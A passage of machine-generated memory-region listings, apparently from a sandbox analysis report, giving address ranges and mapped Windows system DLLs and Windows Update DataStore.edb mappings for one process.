"c:\\windows\\system32\\cryptbase.dll") Region: id = 5819 start_va = 0x7ffc00320000 end_va = 0x7ffc00340fff entry_point = 0x7ffc00320000 region_type = mapped_file name = "joinutil.dll" filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll") Region: id = 5820 start_va = 0x7ffc00370000 end_va = 0x7ffc003a5fff entry_point = 0x7ffc00370000 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 5821 start_va = 0x7ffc003b0000 end_va = 0x7ffc003d5fff entry_point = 0x7ffc003b0000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 5822 start_va = 0x7ffc004c0000 end_va = 0x7ffc004ebfff entry_point = 0x7ffc004c0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 5823 start_va = 0x7ffc00690000 end_va = 0x7ffc006a9fff entry_point = 0x7ffc00690000 region_type = mapped_file name = "eventaggregation.dll" filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll") Region: id = 5824 start_va = 0x7ffc006b0000 end_va = 0x7ffc006b7fff entry_point = 0x7ffc006b0000 region_type = mapped_file name = "dabapi.dll" filename = "\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll") Region: id = 5825 start_va = 0x7ffc006c0000 end_va = 0x7ffc006e7fff entry_point = 0x7ffc006c0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 5826 start_va = 0x7ffc006f0000 end_va = 0x7ffc0075afff entry_point = 0x7ffc006f0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 5827 start_va = 0x7ffc00760000 end_va = 0x7ffc007f7fff entry_point = 0x7ffc00760000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 5828 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 5829 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 5830 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 5831 start_va = 0x7ffc00920000 end_va = 0x7ffc00930fff entry_point = 0x7ffc00920000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 5832 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 5833 start_va = 0x7ffc00f70000 end_va = 0x7ffc00fb3fff entry_point = 0x7ffc00f70000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 5834 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 5835 start_va = 0x7ffc01080000 end_va = 0x7ffc010d3fff entry_point = 0x7ffc01080000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 5836 start_va = 0x7ffc01190000 end_va = 0x7ffc01350fff entry_point = 0x7ffc01190000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 5837 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5838 start_va = 0x7ffc01540000 end_va = 0x7ffc015e4fff entry_point = 0x7ffc01540000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 5839 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5840 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 5841 start_va = 0x7ffc01b20000 end_va = 0x7ffc01ce4fff entry_point = 0x7ffc01b20000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 5842 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5843 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5844 start_va = 0x7ffc02050000 end_va = 0x7ffc02057fff entry_point = 0x7ffc02050000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 5845 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5846 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5847 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 5848 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 5849 start_va = 0x7ffc03980000 end_va = 0x7ffc039e8fff entry_point = 0x7ffc03980000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 5850 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 5851 start_va = 0x7ffc03ae0000 end_va = 0x7ffc03b3afff entry_point = 0x7ffc03ae0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 5852 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 5853 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 5854 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5855 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5856 start_va = 0x7ffbeb910000 end_va = 0x7ffbeb91ffff entry_point = 0x7ffbeb910000 region_type = mapped_file name = "wups.dll" filename = "\\Windows\\System32\\wups.dll" (normalized: "c:\\windows\\system32\\wups.dll") Region: id = 5858 start_va = 0x51e80d0000 end_va = 0x51e80d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e80d0000" filename = "" Region: id = 5859 start_va = 0x51e80e0000 end_va = 0x51e80e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e80e0000" filename = "" Region: id = 5860 start_va = 0x7ffbea820000 end_va = 0x7ffbea877fff entry_point = 0x7ffbea820000 region_type = mapped_file name = "newdev.dll" filename = "\\Windows\\System32\\newdev.dll" (normalized: "c:\\windows\\system32\\newdev.dll") Region: id = 5861 start_va = 0x7ffbea880000 end_va = 0x7ffbea8e0fff entry_point = 0x7ffbea880000 region_type = mapped_file name = "wuuhext.dll" filename = "\\Windows\\System32\\wuuhext.dll" (normalized: "c:\\windows\\system32\\wuuhext.dll") Region: id = 5862 start_va = 0x7ffbeaf20000 end_va = 0x7ffbeaf32fff entry_point = 0x7ffbeaf20000 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 5863 start_va = 0x7ffbefdf0000 end_va = 0x7ffbefe73fff entry_point = 0x7ffbefdf0000 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 5864 start_va = 0x7ffbfb550000 end_va = 0x7ffbfb88cfff entry_point = 0x7ffbfb550000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 5865 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 5869 start_va = 0x51e80f0000 end_va = 0x51e80f6fff entry_point = 0x51e80f0000 region_type = mapped_file name = "newdev.dll.mui" filename = "\\Windows\\System32\\en-US\\newdev.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\newdev.dll.mui") Region: id = 5870 start_va = 0x51e8100000 end_va = 0x51e8100fff entry_point = 0x0 region_type = private name = "private_0x00000051e8100000" filename = "" Region: id = 5871 start_va = 0x51e8210000 end_va = 0x51e8250fff entry_point = 0x0 region_type = private name = "private_0x00000051e8210000" filename = "" Region: id = 5872 start_va = 0x51e8260000 end_va = 0x51e8260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e8260000" filename = "" Region: id = 5873 start_va = 0x51e8270000 end_va = 0x51e8277fff entry_point = 0x0 region_type = private name = "private_0x00000051e8270000" filename = "" Region: id = 5874 start_va = 0x51e8280000 end_va = 0x51e828ffff entry_point = 0x0 region_type = private name = "private_0x00000051e8280000" filename = "" Region: id = 5875 start_va = 0x51e8610000 end_va = 0x51e861ffff entry_point = 0x0 region_type = private name = "private_0x00000051e8610000" filename = "" Region: id = 5876 start_va = 0x51e8640000 end_va = 0x51e86bffff entry_point = 0x0 region_type = private name = "private_0x00000051e8640000" filename = "" Region: id = 5877 start_va = 0x51e86c0000 end_va = 0x51e86c0fff entry_point = 0x0 region_type = private name = "private_0x00000051e86c0000" filename = "" Region: id = 5878 start_va = 0x51e86d0000 end_va = 0x51e86d0fff entry_point = 0x0 region_type = private name = "private_0x00000051e86d0000" filename = "" Region: id = 5879 start_va = 0x51e86e0000 end_va = 0x51e86e3fff entry_point = 0x0 region_type = private name = "private_0x00000051e86e0000" filename = "" Region: id = 5880 start_va = 0x51e86f0000 end_va = 0x51e86f1fff entry_point = 0x0 region_type = private name = "private_0x00000051e86f0000" filename = "" Region: id = 5881 start_va = 0x51e8a00000 end_va = 0x51e8a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e8a00000" filename = "" Region: id = 5882 start_va = 0x51e8a10000 end_va = 0x51e8a1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e8a10000" filename = "" Region: id = 5883 start_va = 0x51e8a20000 end_va = 0x51e8a2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e8a20000" filename = "" Region: id = 5884 start_va = 0x51e8a30000 end_va = 0x51e8a3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e8a30000" filename = "" Region: id = 5885 start_va = 0x51e8a40000 end_va = 0x51e8a4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e8a40000" filename = "" Region: id = 5886 start_va = 0x51e8a50000 end_va = 0x51e8a5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e8a50000" filename = "" Region: id = 5887 start_va = 0x51e8a60000 end_va = 0x51e8a60fff entry_point = 0x0 region_type = private name = "private_0x00000051e8a60000" filename = "" Region: id = 5888 start_va = 0x51e8a70000 end_va = 0x51e8a7ffff entry_point = 0x51e8a70000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5889 start_va = 0x51e8b80000 end_va = 0x51e8bfffff entry_point = 0x0 region_type = private name = "private_0x00000051e8b80000" filename = "" Region: id = 5890 start_va = 0x51e8d80000 end_va = 0x51e8dccfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e8d80000" filename = "" Region: id = 5891 start_va = 0x51e8dd0000 end_va = 0x51e8ddffff entry_point = 0x0 region_type = private name = "private_0x00000051e8dd0000" filename = "" Region: id = 5892 start_va = 0x51e8de0000 end_va = 0x51e8de7fff entry_point = 0x0 region_type = private name = "private_0x00000051e8de0000" filename = "" Region: id = 5893 start_va = 0x51e8df0000 end_va = 0x51e8dfffff entry_point = 0x51e8df0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5894 start_va = 0x51e8e80000 end_va = 0x51e8eccfff entry_point = 0x0 region_type = private name = "private_0x00000051e8e80000" filename = "" Region: id = 5895 start_va = 0x51e8ed0000 end_va = 0x51e8efffff entry_point = 0x0 region_type = private name = "private_0x00000051e8ed0000" filename = "" Region: id = 5896 start_va = 0x51ea160000 end_va = 0x51ea16ffff entry_point = 0x51ea160000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5897 start_va = 0x51ea280000 end_va = 0x51ea28ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051ea280000" filename = "" Region: id = 5898 start_va = 0x51ea290000 end_va = 0x51ea29ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051ea290000" filename = "" Region: id = 5899 start_va = 0x51ea2a0000 end_va = 0x51ea2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051ea2a0000" filename = "" Region: id = 5900 start_va = 0x51ea2b0000 end_va = 0x51ea2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051ea2b0000" filename = "" Region: id = 5901 start_va = 0x51ea2c0000 end_va = 0x51ea2cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051ea2c0000" filename = "" Region: id = 5902 start_va = 0x51ea2d0000 end_va = 0x51ea2dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051ea2d0000" filename = "" Region: id = 5903 start_va = 0x51ea2e0000 end_va = 0x51ea2effff entry_point = 0x51ea2e0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5904 start_va = 0x51ea2f0000 end_va = 0x51ea2fffff entry_point = 0x51ea2f0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5905 start_va = 0x51ea500000 end_va = 0x51ea5fffff entry_point = 0x0 region_type = private name = "private_0x00000051ea500000" filename = "" Region: id = 5906 start_va = 0x51eb100000 end_va = 0x51eb1fffff entry_point = 0x0 region_type = private name = "private_0x00000051eb100000" filename = "" Region: id = 5907 start_va = 0x51eb300000 end_va = 0x51eb3fffff entry_point = 0x0 region_type = private name = "private_0x00000051eb300000" filename = "" Region: id = 5908 start_va = 0x51eb400000 end_va = 0x51eb40ffff entry_point = 0x51eb400000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5909 start_va = 0x51eb410000 end_va = 0x51eb41ffff entry_point = 0x51eb410000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5910 start_va = 0x51eb420000 end_va = 0x51eb42ffff entry_point = 0x51eb420000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5911 start_va = 0x51eb430000 end_va = 0x51eb43ffff entry_point = 0x51eb430000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5912 start_va = 0x51eb440000 end_va = 0x51eb44ffff entry_point = 0x51eb440000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5913 start_va = 0x51eb450000 end_va = 0x51eb45ffff entry_point = 0x51eb450000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5914 start_va = 0x51eb460000 end_va = 0x51eb46ffff entry_point = 0x51eb460000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5915 start_va = 0x51eb470000 end_va = 0x51eb47ffff entry_point = 0x51eb470000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5916 start_va = 0x51eb480000 end_va = 0x51eb48ffff entry_point = 0x51eb480000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5917 start_va = 0x51eb490000 end_va = 0x51eb49ffff entry_point = 0x51eb490000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5918 start_va = 0x51eb4a0000 end_va = 0x51eb4affff entry_point = 0x51eb4a0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 5919 start_va = 0x51eb4b0000 end_va = 0x51eb4b6fff entry_point = 0x0 region_type = private name = "private_0x00000051eb4b0000" filename = "" Region: id = 5920 start_va = 0x51eb4c0000 end_va = 0x51eb4cffff entry_point = 0x0 region_type = private name = "private_0x00000051eb4c0000" filename = "" Region: id = 5921 start_va = 0x51eb4d0000 end_va = 0x51eb4dffff entry_point = 0x0 region_type = private name = "private_0x00000051eb4d0000" filename = "" Region: id = 5922 start_va = 0x51eb4e0000 end_va = 0x51eb4effff entry_point = 0x0 region_type = private name = "private_0x00000051eb4e0000" filename = "" Region: id = 5923 start_va = 0x51eb4f0000 end_va = 0x51eb4fffff entry_point = 0x0 region_type = private name = "private_0x00000051eb4f0000" filename = "" Region: id = 5924 start_va = 0x51eb500000 end_va = 0x51eb5fffff entry_point = 0x0 region_type = private name = "private_0x00000051eb500000" filename = "" Region: id = 5925 start_va = 0x51eb600000 end_va = 0x51eb6fffff entry_point = 0x0 region_type = private name = "private_0x00000051eb600000" filename = "" Region: id = 5926 start_va = 0x51eb900000 end_va = 0x51eb97ffff entry_point = 0x0 region_type = private name = "private_0x00000051eb900000" filename = "" Region: id = 5927 start_va = 0x51eb980000 end_va = 0x51eb98ffff entry_point = 0x0 region_type = private name = "private_0x00000051eb980000" filename = "" Region: id = 5928 start_va = 0x51eb990000 end_va = 0x51eb997fff entry_point = 0x0 region_type = private name = "private_0x00000051eb990000" filename = "" Region: id = 5929 start_va = 0x51eb9a0000 end_va = 0x51eb9affff entry_point = 0x0 region_type = private name = "private_0x00000051eb9a0000" filename = "" Region: id = 5930 start_va = 0x51ebb00000 end_va = 0x51ebbfffff entry_point = 0x0 region_type = private name = "private_0x00000051ebb00000" filename = "" Region: id = 5931 start_va = 0x51ebd00000 end_va = 0x51ebdfffff entry_point = 0x0 region_type = private name = "private_0x00000051ebd00000" filename = "" Region: id = 5932 start_va = 0x51ec500000 end_va = 0x51ed4fffff entry_point = 0x0 region_type = private name = "private_0x00000051ec500000" filename = "" Region: id = 5933 start_va = 0x51ed500000 end_va = 0x51f14fffff entry_point = 0x0 region_type = private name = "private_0x00000051ed500000" filename = "" Region: id = 5934 start_va = 0x51f1500000 end_va = 0x51f54fffff entry_point = 0x0 region_type = private name = "private_0x00000051f1500000" filename = "" Region: id = 5935 start_va = 0x7ff7b3ac6000 end_va = 0x7ff7b3ac7fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ac6000" filename = "" Region: id = 5936 start_va = 0x7ff7b3aee000 end_va = 0x7ff7b3aeffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3aee000" filename = "" Region: id = 5937 start_va = 0x7ff7b3af8000 end_va = 0x7ff7b3af9fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3af8000" filename = "" Region: id = 5938 start_va = 0x7ff7b3c5c000 end_va = 0x7ff7b3c5dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3c5c000" filename = "" Region: id = 5939 start_va = 0x7ffbf2120000 end_va = 0x7ffbf2396fff entry_point = 0x7ffbf2120000 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 6044 start_va = 0x51e6b60000 end_va = 0x51e6b6ffff entry_point = 0x51e6b60000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 6045 start_va = 0x51e6b70000 end_va = 0x51e6b7ffff entry_point = 0x51e6b70000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 6046 start_va = 0x51e6ba0000 end_va = 0x51e6baffff entry_point = 0x51e6ba0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 6047 start_va = 0x51eaf00000 end_va = 0x51eaf0ffff entry_point = 0x51eaf00000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 6048 start_va = 0x51eaf10000 end_va = 0x51eaf1ffff entry_point = 0x51eaf10000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 6049 start_va = 0x51eaf20000 end_va = 0x51eaf2ffff entry_point = 0x51eaf20000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 6050 start_va = 0x51eaf30000 end_va = 0x51eaf3ffff entry_point = 0x51eaf30000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 6051 start_va = 0x51eaf40000 end_va = 0x51eaf4ffff entry_point = 0x51eaf40000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 6052 start_va = 0x51eaf50000 end_va = 0x51eaf5ffff entry_point = 0x51eaf50000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 6053 start_va = 0x51eaf60000 end_va = 0x51eaf6ffff entry_point = 0x51eaf60000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 6054 start_va = 0x51eaf70000 end_va = 0x51eaf7ffff entry_point = 0x51eaf70000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 6055 start_va = 0x51eaf80000 end_va = 0x51eaf8ffff entry_point = 0x51eaf80000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 6056 start_va = 0x51eaf90000 end_va = 0x51eaf9ffff entry_point = 0x51eaf90000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 6057 start_va = 0x51eafa0000 end_va = 0x51eafaffff entry_point = 0x51eafa0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 6058 start_va = 0x51eafb0000 end_va = 0x51eafbffff entry_point = 0x51eafb0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 6059 start_va = 0x51eb9b0000 end_va = 0x51eb9b0fff entry_point = 0x51eb9b0000 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 6060 start_va = 0x51eb9c0000 end_va = 0x51eb9c3fff entry_point = 0x51eb9c0000 region_type = mapped_file name = "wuaueng.dll.mui" filename = "\\Windows\\System32\\en-US\\wuaueng.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wuaueng.dll.mui") Region: id = 6061 start_va = 0x51ebe00000 end_va = 0x51ebefffff entry_point = 0x0 region_type = private name = "private_0x00000051ebe00000" filename = "" Region: id = 6062 start_va = 0x51ebf50000 end_va = 0x51ebf56fff entry_point = 0x0 region_type = private name = "private_0x00000051ebf50000" filename = "" Region: id = 6063 start_va = 0x51ec000000 end_va = 0x51ec0fffff entry_point = 0x0 region_type = private name = "private_0x00000051ec000000" filename = "" Region: id = 6064 start_va = 0x7ff7b3abc000 end_va = 0x7ff7b3abdfff entry_point = 0x0 region_type = private name = 